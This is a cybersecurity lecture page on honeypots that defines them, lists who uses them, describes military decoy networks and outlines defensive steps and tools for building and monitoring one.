CyberSecurity
APT: Advanced Persistent threat
Embedded Files
Lecture 17: APT
Lecture 17: APT
01- Honeypot Definition
01- Honeypot Definition
A system or service deliberately set up to appear real and attractive to attackers, but its main purpose is to lure hackers, monitor their actions, and gather intelligence about their techniques, not to actually protect sensitive data.
Who Uses Honeypots?
Who Uses Honeypots?
1️⃣ Large Enterprises
— Banks, telecoms, healthcare, and critical infrastructure providers.
— Example: Banks use honeypots to detect fraud & targeted attacks early.
2️⃣ Security Operations Centers (SOCs)
— Blue teams integrate honeypots into their detection & response workflows.
3️⃣ Government & Military
— Agencies (like NSA, CERTs) use them to study nation-state threats & cyber-espionage.
4️⃣ Cybersecurity Vendors & MSSPs
— Many Managed Security Service Providers offer deception-as-a-service.
5️⃣ Universities & Research Labs
— To monitor global attack trends & publish findings.
— Example: The Honeynet Project (global non-profit initiative).
6️⃣ Law Enforcement Agencies
— To trap and trace criminals, gather evidence, and understand underground ecosystems.
03- How the Military Uses Honeypots
03- How the Military Uses Honeypots
1️⃣ Strategic Placement
— Honeypots are deployed on networks that appear to hold sensitive or classified data, e.g., fake command servers or dummy weapons control systems.
— Placed both internally (to catch insiders) and externally (to lure foreign attackers).
2️⃣ High-Interaction Honeypots
— Often use high-interaction honeypots, which are full-fledged systems running real services, so attackers fully engage and reveal their techniques.
3️⃣ Honeynets & Decoy Networks
— Set up entire fake military networks (honeynets), mimicking real infrastructure (e.g., mock radar stations, satellite links, SCADA/ICS systems).
4️⃣ Integration with Intelligence
— Data collected from honeypots feeds into cyber threat intelligence (CTI) and is shared with allies.
— Used to attribute attacks to specific actors (nation-states, APTs).
5️⃣ Monitoring & Attribution
— Sessions are monitored, recorded, and analyzed in detail to understand the attacker’s tools, techniques, and intent — supporting both defense and offensive cyber operations.
6️⃣ Legal & Controlled
— Usually isolated from real operational networks, ensuring no real damage or data leakage if compromised.
04- Military and Honeypots
04- Military and Honeypots
Military use honeypots as fishing hooks for the hackers.
Objectives for Military:
Objectives for Military:
✅ Detect nation-state attackers early.
✅ Study enemy cyber weapons & tactics.
✅ Waste adversary resources & time.
✅ Support cyber counterintelligence & attribution.
How Military use it?
1️⃣ Strategic Placement
— Honeypots are deployed on networks that appear to hold sensitive or classified data, e.g., fake command servers or dummy weapons control systems.
— Placed both internally (to catch insiders) and externally (to lure foreign attackers).
2️⃣ High-Interaction Honeypots
— Often use high-interaction honeypots, which are full-fledged systems running real services, so attackers fully engage and reveal their techniques.
3️⃣ Honeynets & Decoy Networks
— Set up entire fake military networks (honeynets), mimicking real infrastructure (e.g., mock radar stations, satellite links, SCADA/ICS systems).
4️⃣ Integration with Intelligence
— Data collected from honeypots feeds into cyber threat intelligence (CTI) and is shared with allies.
— Used to attribute attacks to specific actors (nation-states, APTs).
5️⃣ Monitoring & Attribution
— Sessions are monitored, recorded, and analyzed in detail to understand the attacker’s tools, techniques, and intent — supporting both defense and offensive cyber operations.
6️⃣ Legal & Controlled
— Usually isolated from real operational networks, ensuring no real damage or data leakage if compromised.
05- Honeypot Creation process:
05- Honeypot Creation process:
🎯 Objective
🎯 Objective
Define the purpose of the honeypot:
Detect intrusions.
Study attacker behavior or malware.
Gather threat intelligence.
Distract and delay attackers.
Steps to Create a Honeypot
Steps to Create a Honeypot
1️⃣ Define Your Goal
1️⃣ Define Your Goal
Clearly identify what you want to achieve and what type of attackers you aim to attract.
2️⃣ Choose the Honeypot Type
2️⃣ Choose the Honeypot Type
Low-Interaction
Simulates only a few services; safer and easier to manage.
High-Interaction
Runs a full OS & services; more realistic but riskier.
Honeynet
A network of honeypots to mimic real environments.
3️⃣ Prepare the Environment
3️⃣ Prepare the Environment
Use an isolated or segmented network.
Deploy in a sandbox or virtualized setup.
Harden the honeypot OS & services to prevent real compromise.
4️⃣ Select or Build Tools
4️⃣ Select or Build Tools
Recommended tools:
Honeyd — Emulates hosts & services.
Cowrie — SSH/Telnet honeypot.
KFSensor — Windows-based honeypot.
Custom real systems configured as traps.
5️⃣ Configure Monitoring & Logging
5️⃣ Configure Monitoring & Logging
Enable comprehensive logging (keystrokes, commands, traffic).
Integrate with SIEM or IDS/IPS.
Use out-of-band logging to avoid tampering.
6️⃣ Deploy & Monitor
6️⃣ Deploy & Monitor
Place in the appropriate network zone (DMZ, internal, or cloud).
Make it discoverable but believable.
Monitor continuously and analyze captured data.
7️⃣ Maintain & Update
7️⃣ Maintain & Update
Regularly update configurations and patches.
Review and learn from logs and attacker behavior.
Improve deception techniques over time.
✅ Best Practices
✅ Best Practices
Keep honeypots isolated from critical systems.
Use realistic configurations and naming.
Document scenarios and findings carefully.
Dr. Ghoniem Lawaty
Tech Evangelist @TechHuB Egypt
Page updated
Google Sites
Report abuse